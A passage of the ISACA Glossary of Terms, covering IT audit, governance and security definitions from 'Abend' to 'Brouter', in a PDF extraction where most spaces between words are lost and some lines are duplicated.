Glossary

ISACAGlossaryofTerms
Term Definition
Abend Anabnormalendtoacomputerjob;terminationofataskpriortoitscompletionbecauseofan
errorconditionthatcannotberesolvedbyrecoveryfacilitieswhilethetaskisexecuting
Acceptable Themaximumperiodoftimethatasystemcanbeunavailablebeforecompromisingthe p
interruptionwindow
p y p g
achievementoftheenterprise'sbusinessobjectives
Acceptableusepolicy Apolicythatestablishesanagreementbetweenusersandtheenterpriseanddefinesforall
parties'therangesofusethatareapprovedbeforegainingaccesstoanetworkortheInternet
Accesscontrol Theprocesses,rulesanddeploymentmechanismsthatcontrolaccesstoinformationsystems,
resourcesandphysicalaccesstopremises
Accesscontrollist
(ACL)
Aninternalcomputerizedtableofaccessrulesregardingthelevelsofcomputeraccess
permittedtologonIDsandcomputerterminals
ScopeNote:Alsoreferredtoasaccesscontroltables
Accesscontroltable Aninternalcomputerizedtableofaccessrulesregardingthelevelsofcomputeraccess
permittedtologonIDsandcomputerterminals
A th d Th t h i d f l ti d i fil t ti f i t i l Accessmethod Thetechniqueusedforselectingrecordsinafile,oneatatime,forprocessing,retrievalor
storage
Theaccessmethodisrelatedto,butdistinctfrom,thefileorganization,whichdetermineshow
therecordsarestored.
Accesspath Thelogicalroutethatanendusertakestoaccesscomputerizedinformation
ScopeNote:Typicallyincludesaroutethroughtheoperatingsystem,telecommunications
software,selectedapplicationsoftwareandtheaccesscontrolsystem
Accessrights Thepermissionorprivilegesgrantedtousers,programsorworkstationstocreate,change,
deleteorviewdataandfileswithinasystem,asdefinedbyrulesestablishedbydataowners
and the information security policy andtheinformationsecuritypolicy
Accessserver Providescentralizedaccesscontrolformanagingremoteaccessdialupservices
Accountability Theabilitytomapagivenactivityoreventbacktotheresponsibleparty
Accountabilityof
governance
Governanceensuresthatenterpriseobjectivesareachievedbyevaluatingstakeholderneeds,
conditionsandoptions;settingdirectionthroughprioritizationanddecisionmaking;and
monitoringperformance,complianceandprogressagainstplans.Inmostenterprises,
governanceistheresponsibilityoftheboardofdirectorsundertheleadershipofthe governanceistheresponsibilityoftheboardofdirectorsundertheleadershipofthe
chairperson.
ScopeNote:COBIT5Perspective
2014 ISACA All rights reserved. Page 1 of 112 ISACAGlossary of Terms
Term Definition
Accountableparty Theindividual,grouporentitythatisultimatelyresponsibleforasubjectmatter,processor
scope scope
ScopeNote:WithintheITAssuranceFramework(ITAF),theterm"management"isequivalent
to"accountableparty."
Acknowledgment
(ACK)
Aflagsetinapackettoindicatetothesenderthatthepreviouspacketsentwasaccepted
correctlybythereceiverwithouterrors,orthatthereceiverisnowreadytoaccepta
transmission transmission
Activerecoverysite
(Mirrored)
Arecoverystrategythatinvolvestwoactivesites,eachcapableoftakingovertheother's
workloadintheeventofadisaster
ScopeNote:Eachsitewillhaveenoughidleprocessingpowertorestoredatafromtheother
siteandtoaccommodatetheexcessworkloadintheeventofadisaster.
Activeresponse Aresponseinwhichthesystemeitherautomatically,orinconcertwiththeuser,blocksor p p y y, ,
otherwiseaffectstheprogressofadetectedattack
ScopeNote:Takesoneofthreeforms:amendingtheenvironment,collectingmore
informationorstrikingbackagainsttheuser
Activity ThemainactionstakentooperatetheCOBITprocess
Address Withincomputerstorage,thecodeusedtodesignatethelocationofaspecificpieceofdata
Addressspace Thenumberofdistinctlocationsthatmaybereferredtowiththemachineaddress
ScopeNote:Formostbinarymachines,itisequalto2n,wherenisthenumberofbitsinthe
machineaddress.
Addressing Themethodusedtoidentifythelocationofaparticipantinanetwork
ScopeNote:Ideally,specifieswheretheparticipantislocatedratherthanwhotheyare
(name)orhowtogetthere(routing)
Adjustingperiod Thecalendarcancontain"real"accountingperiodsand/oradjustingaccountingperiods.The
"real"accountingperiodsmustnotoverlapandcannothaveanygapsbetweenthem.
Adjustingaccountingperiodscanoverlapwithotheraccountingperiods.
ScopeNote:Forexample,aperiodcalledDEC93canbedefinedthatincludes01DEC1993
through31DEC1993.AnadjustingperiodcalledDEC3193canalsobedefinedthatincludes
onlyoneday:31DEC1993through31DEC1993.
Administrativecontrol Therules,proceduresandpracticesdealingwithoperationaleffectiveness,efficiencyand
adherence to regulations and management policies adherencetoregulationsandmanagementpolicies
AdvancedEncryption
Standard(AES)
Apublicalgorithmthatsupportskeysfrom128bitsto256bitsinsize
Term Definition
AdvancedEncryption
Standard (AES)
Apublicalgorithmthatsupportskeysfrom128bitsto256bitsinsize
Standard(AES)
Advancedpersistent
threat(APT)
Anadversarythatpossessessophisticatedlevelsofexpertiseandsignificantresourceswhich
allowittocreateopportunitiestoachieveitsobjectivesusingmultipleattackvectors(NIST
SP80061)
Scope Note: The APT: ScopeNote:TheAPT:
1.pursuesitsobjectivesrepeatedlyoveranextendedperiodoftime
2.adaptstodefenderseffortstoresistit
3.isdeterminedtomaintainthelevelofinteractionneededtoexecuteitsobjectives
Adversary Athreatagent
Adware Asoftwarepackagethatautomaticallyplays,displaysordownloadsadvertisingmaterialtoa
computerafterthesoftwareisinstalledonitorwhiletheapplicationisbeingused p pp g
ScopeNote:Inmostcases,thisisdonewithoutanynotificationtotheuserorwithoutthe
usersconsent.Thetermadwaremayalsorefertosoftwarethatdisplaysadvertisements,
whetherornotitdoessowiththeusersconsent;suchprogramsdisplayadvertisementsasan
alternativetosharewareregistrationfees.Theseareclassifiedasadwareinthesenseof
advertisingsupportedsoftware,butnotasspyware.Adwareinthisformdoesnotoperate g pp , py p
surreptitiouslyormisleadtheuser,anditprovidestheuserwithaspecificservice.
Alertsituation Thepointinanemergencyprocedurewhentheelapsedtimepassesathresholdandthe
interruptionisnotresolved.Theenterpriseenteringintoanalertsituationinitiatesaseriesof
escalationsteps.
Ali t A t t h th bl f d t f t i IT t th l Alignment AstatewheretheenablersofgovernanceandmanagementofenterpriseITsupportthegoals
andstrategiesoftheenterprise
ScopeNote:COBIT5Perspective
Allocationentry Arecurringjournalentryusedtoallocaterevenuesorcosts
Scope Note: For example an allocation entry could be defined to allocate costs to each ScopeNote:Forexample,anallocationentrycouldbedefinedtoallocatecoststoeach
departmentbasedonheadcount.
Alpha Theuseofalphabeticcharactersoranalphabeticcharacterstring
Alternatefacilities Locationsandinfrastructuresfromwhichemergencyorbackupprocessesareexecuted,when
themainpremisesareunavailableordestroyed
Scope Note: Includes other buildings offices or data processing centers ScopeNote:Includesotherbuildings,officesordataprocessingcenters
Alternateprocess Automaticormanualprocessdesignedandestablishedtocontinuecriticalbusinessprocesses
frompointoffailuretoreturntonormal
Term Definition
Alternativerouting Aservicethatallowstheoptionofhavinganalternateroutetocompleteacallwhenthe
marked destination is not available markeddestinationisnotavailable
ScopeNote:Insignaling,alternativeroutingistheprocessofallocatingsubstituteroutesfora
givensignalingtrafficstreamincaseoffailure(s)affectingthenormalsignalinglinksorroutes
ofthattrafficstream.
AmericanStandard
Code for Information
SeeASCII
CodeforInformation
Interchange
Amortization Theprocessofcostallocationthatassignstheoriginalcostofanintangibleassettotheperiods
benefited;calculatedinthesamewayasdepreciation
Analog Atransmissionsignalthatvariescontinuouslyinamplitudeandtimeandisgeneratedinwave
formation
ScopeNote:Analogsignalsareusedintelecommunications
Analyticaltechnique Theexaminationofratios,trends,andchangesinbalancesandothervaluesbetweenperiods
toobtainabroadunderstandingoftheenterprise'sfinancialoroperationalpositionandto
identifyareasthatmayrequirefurtherorcloserinvestigation
ScopeNote:Oftenusedwhenplanningtheassuranceassignment
Anomaly Unusualorstatisticallyrare
Anomalydetection Detectiononthebasisofwhetherthesystemactivitymatchesthatdefinedasabnormal
Anonymity Thequalityorstateofnotbeingnamedoridentified
Antimalware Atechnologywidelyusedtoprevent,detectandremovemanycategoriesofmalware,
i l di i T j k l li i b l i d includingcomputerviruses,worms,Trojans,keyloggers,maliciousbrowserplugins,adware
andspyware
Antivirussoftware AnapplicationsoftwaredeployedatmultiplepointsinanITarchitecture
Itisdesignedtodetectandpotentiallyeliminateviruscodebeforedamageisdoneandrepair
orquarantinefilesthathavealreadybeeninfected
Appearance The act of giving the idea or impression of being or doing something Appearance Theactofgivingtheideaorimpressionofbeingordoingsomething
Appearanceof
independence
Behavioradequatetomeetthesituationsoccurringduringauditwork(interviews,meetings,
reporting,etc.)
ScopeNote:AnISauditorshouldbeawarethatappearanceofindependencedependsonthe
perceptionsofothersandcanbeinfluencedbyimproperactionsorassociations.
Term Definition
Applet Aprogramwritteninaportable,platformindependentcomputerlanguage,suchasJava,
JavaScript or Visual Basic JavaScriptorVisualBasic
ScopeNote:AnappletisusuallyembeddedinanHyperTextMarkupLanguage(HTML)page
downloadedfromwebserversandthenexecutedbyabrowseronclientmachinestorunany
webbasedapplication(e.g.,generatewebpageinputforms,runaudio/videoprograms,etc.).
Appletscanonlyperformarestrictedsetofoperations,thuspreventing,oratleastminimizing,
the possible security compromise of the host computers However applets expose the user's thepossiblesecuritycompromiseofthehostcomputers.However,appletsexposetheuser s
machinetoriskifnotproperlycontrolledbythebrowser,whichshouldnotallowanappletto
accessamachine'sinformationwithoutpriorauthorizationoftheuser.
Application Acomputerprogramorsetofprogramsthatperformstheprocessingofrecordsforaspecific
function
ScopeNote:Contrastswithsystemsprograms,suchasanoperatingsystemornetwork
controlprogram,andwithutilityprograms,suchascopyorsort
Application
acquisitionreview
Anevaluationofanapplicationsystembeingacquiredorevaluated,thatconsiderssuch
mattersas:appropriatecontrolsaredesignedintothesystem;theapplicationwillprocess
informationinacomplete,accurateandreliablemanner;theapplicationwillfunctionas
intended;theapplicationwillfunctionincompliancewithanyapplicablestatutoryprovisions;
thesystemisacquiredincompliancewiththeestablishedsystemacquisitionprocess
Application
architecture
Descriptionofthelogicalgroupingofcapabilitiesthatmanagetheobjectsnecessarytoprocess
informationandsupporttheenterprisesobjectives.
ScopeNote:COBIT5perspective
A li ti Th f t bli hi th ff ti d i d ti f t t d t l ithi Application
benchmarking
Theprocessofestablishingtheeffectivedesignandoperationofautomatedcontrolswithinan
application
Applicationcontrols Thepolicies,proceduresandactivitiesdesignedtoprovidereasonableassurancethat
objectivesrelevanttoagivenautomatedsolution(application)areachieved
Application
developmentreview
Anevaluationofanapplicationsystemunderdevelopmentthatconsidersmatterssuchas:
appropriatecontrolsaredesignedintothesystem;theapplicationwillprocessinformationina
complete accurate and reliable manner; the application will function as intended; the complete,accurateandreliablemanner;theapplicationwillfunctionasintended;the
applicationwillfunctionincompliancewithanyapplicablestatutoryprovisions;thesystemis
developedincompliancewiththeestablishedsystemdevelopmentlifecycleprocess
Application
implementation
review
Anevaluationofanypartofanimplementationproject
Scope Note: Examples include project management test plans and user acceptance testing review ScopeNote:Examplesincludeprojectmanagement,testplansanduseracceptancetesting
(UAT)procedures.
Term Definition
Applicationlayer IntheOpenSystemsInterconnection(OSI)communicationsmodel,theapplicationlayer
provides services for an application program to ensure that effective communication with providesservicesforanapplicationprogramtoensurethateffectivecommunicationwith
anotherapplicationprograminanetworkispossible.
ScopeNote:Theapplicationlayerisnottheapplicationthatisdoingthecommunication;a
servicelayerthatprovidestheseservices.
Application
maintenance review
Anevaluationofanypartofaprojecttoperformmaintenanceonanapplicationsystem
maintenancereview
ScopeNote:Examplesincludeprojectmanagement,testplansanduseracceptancetesting
(UAT)procedures.
Applicationor
managedservice
provider(ASP/MSP)
Athirdpartythatdeliversandmanagesapplicationsandcomputerservices,includingsecurity
servicestomultipleusersviatheInternetoraprivatenetwork
p ( / )
Applicationprogram Aprogramthatprocessesbusinessdatathroughactivitiessuchasdataentry,updateorquery
ScopeNote:Contrastswithsystemsprograms,suchasanoperatingsystemornetwork
controlprogram,andwithutilityprogramssuchascopyorsort
Application Theactorfunctionofdevelopingandmaintainingapplicationprogramsinproduction
programming
Application
programming
interface(API)
Asetofroutines,protocolsandtoolsreferredtoas"buildingblocks"usedinbusiness
applicationsoftwaredevelopment
ScopeNote:AgoodAPImakesiteasiertodevelopaprogrambyprovidingallthebuilding
blocksrelatedtofunctionalcharacteristicsofanoperatingsystemthatapplicationsneedto
specify,forexample,wheninterfacingwiththeoperatingsystem(e.g.,providedbyMicrosoft
Windows,differentversionsofUNIX).AprogrammerutilizestheseAPIsindeveloping
applicationsthatcanoperateeffectivelyandefficientlyontheplatformchosen.
Applicationproxy Aservicethatconnectsprogramsrunningoninternalnetworkstoservicesonexterior
networksbycreatingtwoconnections,onefromtherequestingclientandanothertothe
destination service destinationservice
Applicationsecurity Referstothesecurityaspectssupportedbytheapplication,primarilywithregardtotheroles
orresponsibilitiesandaudittrailswithintheapplications
Applicationservice
provider(ASP)
Alsoknownasmanagedserviceprovider(MSP),itdeploys,hostsandmanagesaccesstoa
packagedapplicationtomultiplepartiesfromacentrallymanagedfacility.
Scope Note: The applications are delivered over networks on a subscription basis ScopeNote:Theapplicationsaredeliveredovernetworksonasubscriptionbasis.
Term Definition
Applicationsoftware
tracing and mapping
Specializedtoolsthatcanbeusedtoanalyzetheflowofdatathroughtheprocessinglogicof
the application software and document the logic paths control conditions and processing tracingandmapping theapplicationsoftwareanddocumentthelogic,paths,controlconditionsandprocessing
sequences
ScopeNote:Boththecommandlanguageorjobcontrolstatementsandprogramming
languagecanbeanalyzed.Thistechniqueincludesprogram/system:mapping,tracing,
snapshots,parallelsimulationsandcodecomparisons.
Applicationsystem Anintegratedsetofcomputerprogramsdesignedtoserveaparticularfunctionthathas Applicationsystem Anintegratedsetofcomputerprogramsdesignedtoserveaparticularfunctionthathas
specificinput,processingandoutputactivities
ScopeNote:Examplesincludegeneralledger,manufacturingresourceplanningandhuman
resource(HR)management.
Architecture Descriptionofthefundamentalunderlyingdesignofthecomponentsofthebusinesssystem,
orofoneelementofthebusinesssystem(e.g.,technology),therelationshipsamongthem, y ( g , gy), p g ,
andthemannerinwhichtheysupportenterpriseobjectives
Architectureboard Agroupofstakeholdersandexpertswhoareaccountableforguidanceonenterprise
architecturerelatedmattersanddecisions,andforsettingarchitecturalpoliciesandstandards
Arithmeticlogicunit
(ALU)
Theareaofthecentralprocessingunit(CPU)thatperformsmathematicalandanalytical
operations
Artificialintelligence Advancedcomputersystemsthatcansimulatehumancapabilities,suchasanalysis,basedona
predeterminedsetofrules
ASCII Representing128characters,theAmericanStandardCodeforInformationInterchange(ASCII)
codenormallyuses7bits.However,somevariationsoftheASCIIcodesetallow8bits.This8
bi ASCII d ll 2 6 h b d bitASCIIcodeallows256characterstoberepresented.
Assembler Aprogramthattakesasinputaprogramwritteninassemblylanguageandtranslatesitinto
machinecodeormachinelanguage
AssemblyLanguage Alowlevelcomputerprogramminglanguagewhichusessymboliccodeandproducesmachine
instructions
Assertion Anyformaldeclarationorsetofdeclarationsaboutthesubjectmattermadebymanagement
ScopeNote:Assertionsshouldusuallybeinwritingandcommonlycontainalistofspecific
attributesaboutthesubjectmatteroraboutaprocessinvolvingthesubjectmatter.
Assessment Abroadreviewofthedifferentaspectsofacompanyorfunctionthatincludeselementsnot
covered by a structured assurance initiative coveredbyastructuredassuranceinitiative
ScopeNote:Mayincludeopportunitiesforreducingthecostsofpoorquality,employee
perceptionsonqualityaspects,proposalstoseniormanagementonpolicy,goals,etc.
Term Definition
Asset Somethingofeithertangibleorintangiblevaluethatisworthprotecting,includingpeople,
information infrastructure finances and reputation information,infrastructure,financesandreputation
Assurance Pursuanttoanaccountablerelationshipbetweentwoormoreparties,anITauditand
assuranceprofessionalisengagedtoissueawrittencommunicationexpressingaconclusion
aboutthesubjectmattersforwhichtheaccountablepartyisresponsible.Assurancereferstoa
numberofrelatedactivitiesdesignedtoprovidethereaderoruserofthereportwithalevelof
assuranceorcomfortoverthesubjectmatter.
ScopeNote:Assuranceengagementscouldincludesupportforauditedfinancialstatements,
reviewsofcontrols,compliancewithrequiredstandardsandpractices,andcompliancewith
agreements, licenses, legislation and regulation.
Assurance
engagement
Anobjectiveexaminationofevidenceforthepurposeofprovidinganassessmentonrisk
management,controlorgovernanceprocessesfortheenterprise.
ScopeNote:Examplesmayincludefinancial,performance,complianceandsystemsecurity
engagements
Assuranceinitiative Anobjectiveexaminationofevidenceforthepurposeofprovidinganassessmentonrisk
management,controlorgovernanceprocessesfortheenterprise
ScopeNote:Examplesmayincludefinancial,performance,complianceandsystemsecurity
engagements.
Asymmetrickey
(publickey)
Aciphertechniqueinwhichdifferentcryptographickeysareusedtoencryptanddecrypta
message
ScopeNote:SeePublickeyencryption.
Asynchronous
T f M d (ATM)
Ahighbandwidthlowdelayswitchingandmultiplexingtechnologythatallowsintegrationof
l i i d id ll d I i d li k l l TransferMode(ATM) realtimevoiceandvideoaswellasdata.Itisadatalinklayerprotocol.
ScopeNote:ATMisaprotocolindependenttransportmechanism.Itallowshighspeeddata
transferratesatupto155Mbit/s.
TheacronymATMshouldnotbeconfusedwiththealternateusageforATM,whichrefersto
t t d t ll hi anautomatedtellermachine.
Asynchronous
transmission
Characteratatimetransmission
Attack Anactualoccurrenceofanadverseevent
Attackmechanism Amethodusedtodelivertheexploit.Unlesstheattackerispersonallyperformingtheattack,
anattackmechanismmayinvolveapayload,orcontainer,thatdeliverstheexploittothe
target target.
Attackvector Apathorrouteusedbytheadversarytogainaccesstothetarget(asset)
ScopeNote:Therearetwotypesofattackvectors:ingressandegress(alsoknownasdata
exfiltration)
Attenuation Reductionofsignalstrengthduringtransmission
Term Definition
Attestreporting
engagement
AnengagementinwhichanISauditorisengagedtoeitherexaminemanagementsassertion
regarding a particular subject matter or the subject matter directly engagement regardingaparticularsubjectmatterorthesubjectmatterdirectly
ScopeNote:TheISauditorsreportconsistsofanopinionononeofthefollowing:Thesubject
matter.Thesereportsrelatedirectlytothesubjectmatteritselfratherthantoanassertion.In
certainsituationsmanagementwillnotbeabletomakeanassertionoverthesubjectofthe
engagement.AnexampleofthissituationiswhenITservicesareoutsourcedtothirdparty.
Management will not ordinarily be able to make an assertion over the controls that the third Managementwillnotordinarilybeabletomakeanassertionoverthecontrolsthatthethird
partyisresponsiblefor.Hence,anISauditorwouldhavetoreportdirectlyonthesubject
matter rather than on an assertion.
Attitude Wayofthinking,behaving,feeling,etc.
Attributesampling Methodtoselectaportionofapopulationbasedonthepresenceorabsenceofacertain
characteristic
Audit Formalinspectionandverificationtocheckwhetherastandardorsetofguidelinesisbeing p g g
followed,recordsareaccurate,orefficiencyandeffectivenesstargetsarebeingmet
ScopeNote:Maybecarriedoutbyinternalorexternalgroups
Auditaccountability Performancemeasurementofservicedeliveryincludingcost,timelinessandqualityagainst
agreedservicelevels
Auditauthority Astatementofthepositionwithintheenterprise,includinglinesofreportingandtherightsof
access
Auditcharter Adocumentapprovedbythosechargedwithgovernancethatdefinesthepurpose,authority
andresponsibilityoftheinternalauditactivity
ScopeNote:Thechartershould:
Establishtheinternalauditfuntionspositionwithintheenterprise
Authoriseaccesstorecords,personnelandphysicalpropertiesrelevanttotheperformance
ofISauditandassuranceengagementsDefinethescopeofauditfunctionsactivities
Auditengagement Aspecificauditassignmentorreviewactivity,suchasanaudit,controlselfassessmentreview,
fraudexaminationorconsultancy.
ScopeNote:Anauditengagementmayincludemultipletasksoractivitiesdesignedto
accomplishaspecificsetofrelatedobjectives.
Auditevidence Theinformationusedtosupporttheauditopinion
Auditexpertsystems ExpertordecisionsupportsystemsthatcanbeusedtoassistISauditorsinthedecisionmaking
processbyautomatingtheknowledgeofexpertsinthefield
ScopeNote:Thistechniqueincludesautomatedriskanalysis,systemssoftwareandcontrol
objectivessoftwarepackages.
Term Definition
Auditobjective Thespecificgoal(s)ofanaudit
ScopeNote:Theseoftencenteronsubstantiatingtheexistenceofinternalcontrolsto
minimizebusinessrisk.
Auditplan 1.Aplancontainingthenature,timingandextentofauditprocedurestobeperformedby
engagementteammembersinordertoobtainsufficientappropriateauditevidencetoform
anopinion
ScopeNote:Includestheareastobeaudited,thetypeofworkplanned,thehighlevel
objectivesandscopeofthework,andtopicssuchasbudget,resourceallocation,schedule
dates,typeofreportanditsintendedaudienceandothergeneralaspectsofthework
2.Ahighleveldescriptionoftheauditworktobeperformedinacertainperiodoftime
Auditprogram Astepbystepsetofauditproceduresandinstructionsthatshouldbeperformedtocomplete
anaudit
Auditresponsibility Theroles,scopeandobjectivesdocumentedintheservicelevelagreement(SLA)between
managementandaudit
Auditrisk Theriskofreachinganincorrectconclusionbaseduponauditfindings
ScopeNote:Thethreecomponentsofauditriskare:
Controlrisk
Detectionrisk
Inherentrisk
Auditsampling Theapplicationofauditprocedurestolessthan100percentoftheitemswithinapopulation
toobtainauditevidenceaboutaparticularcharacteristicofthepopulation
A dit bj t tt Ri k l t t th d i Auditsubjectmatter
risk
Riskrelevanttotheareaunderreview:
Businessrisk(customercapabilitytopay,creditworthiness,marketfactors,etc.)
Contractrisk(liability,price,type,penalties,etc.)
Countryrisk(political,environment,security,etc.)
Projectrisk(resources,skillset,methodology,productstability,etc.)
Technologyrisk(solution,architecture,hardwareandsoftwareinfrastructurenetwork,
d li h l t ) deliverychannels,etc.)
Scope Note: See inherent risk
Audittrail Avisibletrailofevidenceenablingonetotraceinformationcontainedinstatementsorreports
backtotheoriginalinputsource
Term Definition
Audituniverse Aninventoryofauditareasthatiscompiledandmaintainedtoidentifyareasforauditduring
the audit planning process theauditplanningprocess
ScopeNote:Traditionally,thelistincludesallfinancialandkeyoperationalsystemsaswellas
otherunitsthatwouldbeauditedaspartoftheoverallcycleofplannedwork.Theaudit
universeservesasthesourcefromwhichtheannualauditscheduleisprepared.Theuniverse
willbeperiodicallyrevisedtoreflectchangesintheoverallriskprofile.
Auditability Theleveltowhichtransactionscanbetracedandauditedthroughasystem
Auditableunit Subjects,unitsorsystemsthatarecapableofbeingdefinedandevaluated
ScopeNote:Auditableunitsmayinclude:
Policies,proceduresandpractices
Costcenters,profitcentersandinvestmentcenters Costcenters,profitcentersandinvestmentcenters
Generalledgeraccountbalances
Informationsystems(manualandcomputerized)
Majorcontractsandprograms
Organizationalunits,suchasproductorservicelines
Functions,suchasinformationtechnology(IT),purchasing,marketing,production,finance,
accountingandhumanresources(HR) accountingandhumanresources(HR)
Transactionsystemsforactivities,suchassales,collection,purchasing,disbursement,
inventoryandcostaccounting,production,treasury,payroll,andcapitalassets
Financialstatements
Lawsandregulations
Auditorsopinion AformalstatementexpressedbytheISauditorassuranceprofessionalthatdescribesthe
f h di h d d d h d h h h fi di scopeoftheaudit,theproceduresusedtoproducethereportandwhetherornotthefindings
supportthattheauditcriteriahavebeenmet.
ScopeNote:Thetypesofopinionsare:
Unqualifiedopinion:Notesnoexceptionsornoneoftheexceptionsnotedaggregatetoa
significantdeficiency
Q lifi d i i N t ti t d t i ifi t d fi i (b t t t i l Qualifiedopinion:Notesexceptionsaggregatedtoasignificantdeficiency(butnotamaterial
weakness)
Adverseopinion:Notesoneormoresignificantdeficienciesaggregatingtoamaterial
weakness
Term Definition
Authentication 1.Theactofverifyingidentity(i.e.,user,system)
ScopeNote:Risk:Canalsorefertotheverificationofthecorrectnessofapieceofdata
2.Theactofverifyingtheidentityofauserandtheuserseligibilitytoaccesscomputerized
information
Scope Note: Assurance: Authentication is designed to protect against fraudulent logon ScopeNote:Assurance:Authenticationisdesignedtoprotectagainstfraudulentlogon
activity.Itcanalsorefertotheverificationofthecorrectnessofapieceofdata.
Authenticity Undisputedauthorship
Automated
applicationcontrols
Controlsthathavebeenprogrammedandembeddedwithinanapplication
Availability Ensuringtimelyandreliableaccesstoanduseofinformation y g y
Awareness Beingacquaintedwith,mindfulof,consciousofandwellinformedonaspecificsubject,which
impliesknowingandunderstandingasubjectandactingaccordingly
Backdoor Ameansofregainingaccesstoacompromisedsystembyinstallingsoftwareorconfiguring
existingsoftwaretoenableremoteaccessunderattackerdefinedconditions
Backbone Themaincommunicationchannelofadigitalnetwork.Thepartofanetworkthathandlesthe
majortraffic
ScopeNote:Employsthehighestspeedtransmissionpathsinthenetworkandmayalsorun
thelongestdistances.Smallernetworksareattachedtothebackbone,andnetworksthat
connectdirectlytotheenduserorcustomerarecalled"accessnetworks."Abackbonecan
spanageographicareaofanysizefromasinglebuildingtoanofficecomplextoanentire
country.Or,itcanbeassmallasabackplaneinasinglecabinet.
Backup Files,equipment,dataandproceduresavailableforuseintheeventofafailureorloss,ifthe
originalsaredestroyedoroutofservice
Backupcenter AnalternatefacilitytocontinueIT/ISoperationswhentheprimarydataprocessing(DP)center
isunavailable
Badge A card or other device that is presented or displayed to obtain access to an otherwise Badge Acardorotherdevicethatispresentedordisplayedtoobtainaccesstoanotherwise
restrictedfacility,asasymbolofauthority(e.g.,thepolice),orasasimplemeansof
identification
ScopeNote:Alsousedinadvertisingandpublicity
Balancedscorecard
(BSC)
DevelopedbyRobertS.KaplanandDavidP.Nortonasacoherentsetofperformance
measures organized into four categories that includes traditional financial measures but adds (BSC) measuresorganizedintofourcategoriesthatincludestraditionalfinancialmeasures,butadds
customer,internalbusinessprocess,andlearningandgrowthperspectives
Bandwidth Therangebetweenthehighestandlowesttransmittablefrequencies.Itequatestothe
transmissioncapacityofanelectroniclineandisexpressedinbytespersecondorHertz(cycles
persecond).
Term Definition
Barcode Aprintedmachinereadablecodethatconsistsofparallelbarsofvariedwidthandspacing
Basecase Astandardizedbodyofdatacreatedfortestingpurposes
ScopeNote:Usersnormallyestablishthedata.Basecasesvalidateproductionapplication
systemsandtesttheongoingaccurateoperationofthesystem.
Baseband Aformofmodulationinwhichdatasignalsarepulseddirectlyonthetransmissionmedium
without frequency division and usually utilize a transceiver withoutfrequencydivisionandusuallyutilizeatransceiver
ScopeNote:Theentirebandwidthofthetransmissionmedium(e.g.,coaxialcable)isutilized
forasinglechannel.
Baselinearchitecture Theexistingdescriptionofthefundamentalunderlyingdesignofthecomponentsofthe
businesssystembeforeenteringacycleofarchitecturereviewandredesign
Bastion Systemheavilyfortifiedagainstattacks
Batchcontrol Correctnesschecksbuiltintodataprocessingsystemsandappliedtobatchesofinputdata,
particularlyinthedatapreparationstage
ScopeNote:Therearetwomainformsofbatchcontrols:sequencecontrol,whichinvolves
numberingtherecordsinabatchconsecutivelysothatthepresenceofeachrecordcanbe
confirmed;andcontroltotal,whichisatotalofthevaluesinselectedfieldswithinthe
transactions.
Batchprocessing Theprocessingofagroupoftransactionsatthesametime
ScopeNote:Transactionsarecollectedandprocessedagainstthemasterfilesataspecified
time.
Baudrate Therateoftransmissionfortelecommunicationsdata,expressedinbitspersecond(bps)
Benchmark Atestthathasbeendesignedtoevaluatetheperformanceofasystem
ScopeNote:Inabenchmarktest,asystemissubjectedtoaknownworkloadandthe
performance of the system against this workload is measured Typically the purpose is to performanceofthesystemagainstthisworkloadismeasured.Typically,thepurposeisto
comparethemeasuredperformancewiththatofothersystemsthathavebeensubjecttothe
samebenchmarktest.
Benchmarking Asystematicapproachtocomparingenterpriseperformanceagainstpeersandcompetitorsin
anefforttolearnthebestwaysofconductingbusiness
Scope Note: Examples include benchmarking of quality logistic efficiency and various other ScopeNote:Examplesincludebenchmarkingofquality,logisticefficiencyandvariousother
metrics.
Benefit Inbusiness,anoutcomewhosenatureandvalue(expressedinvariousways)areconsidered
advantageousbyanenterprise
Term Definition
Benefitsrealization Oneoftheobjectivesofgovernance.Thebringingaboutofnewbenefitsfortheenterprise,the
maintenance and extension of existing forms of benefits and the elimination of those maintenanceandextensionofexistingformsofbenefits,andtheeliminationofthose
initiativesandassetsthatarenotcreatingsufficientvalue
Binarycode Acodewhoserepresentationislimitedto0and1
Biometriclocks Doorandentrylocksthatareactivatedbysuchbiometricfeaturesasvoice,eyeretina,
fingerprint or signature fingerprintorsignature
Biometrics Asecuritytechniquethatverifiesanindividualsidentitybyanalyzingauniquephysical
attribute,suchasahandprint
Bitstreamimage Bitstreambackups,alsoreferredtoasmirrorimagebackups,involvethebackupofallareasof
acomputerharddiskdriveorothertypeofstoragemedia.
ScopeNote:Suchbackupsexactlyreplicateallsectorsonagivenstoragedeviceincludingall ScopeNote:Suchbackupsexactlyreplicateallsectorsonagivenstoragedeviceincludingall
filesandambientdatastorageareas.
Blackboxtesting Atestingapproachthatfocusesonthefunctionalityoftheapplicationorproductanddoesnot
requireknowledgeofthecodeintervals
Blockcipher Apublicalgorithmthatoperatesonplaintextinblocks(stringsorgroups)ofbits
Botnet Atermderivedfromrobotnetwork;isalargeautomatedanddistributednetworkof
previouslycompromisedcomputersthatcanbesimultaneouslycontrolledtolaunchlarge
scaleattackssuchasadenialofserviceattackonselectedvictims
Boundary Logicalandphysicalcontrolstodefineaperimeterbetweentheorganizationandtheoutside
world
Bridge Datalinklayerdevicedevelopedintheearly1980stoconnectlocalareanetworks(LANs)or
createtwoseparateLANorwideareanetwork(WAN)networksegmentsfromasingle
segmenttoreducecollisiondomains
ScopeNote:Abridgeactsasastoreandforwarddeviceinmovingframestowardtheir
destination.ThisisachievedbyanalyzingtheMACheaderofadatapacket,whichrepresents
thehardwareaddressofanNIC.
Bringyourowndevice
(BYOD)
Anenterprisepolicyusedtopermitpartialorfullintegrationofuserownedmobiledevicesfor
businesspurposes
Broadband Multiple channels are formed by dividing the transmission medium into discrete frequency Broadband Multiplechannelsareformedbydividingthetransmissionmediumintodiscretefrequency
segments.
ScopeNote:Broadbandgenerallyrequirestheuseofamodem.
Broadcast Amethodtodistributeinformationtomultiplerecipientssimultaneously
Term Definition
Brouter Devicethatperformsthefunctionsofbothabridgeandarouter
ScopeNote:Abrouteroperatesatboththedatalinkandthenetworklayers.Itconnectssame
datalinktypeLANsegmentsaswellasdifferentdatalinkones,whichisasignificant
advantage.Likeabridge,itforwardspacketsbasedonthedatalinklayeraddresstoadifferent
networkofthesametype.Also,wheneverrequired,itprocessesandforwardsmessagestoa
differentdatalinktypenetworkbasedonthenetworkprotocoladdress.Whenconnecting
same data link type networks it is as fast as a bridge and is able to connect different data link samedatalinktypenetworks,itisasfastasabridgeandisabletoconnectdifferentdatalink
type networks.
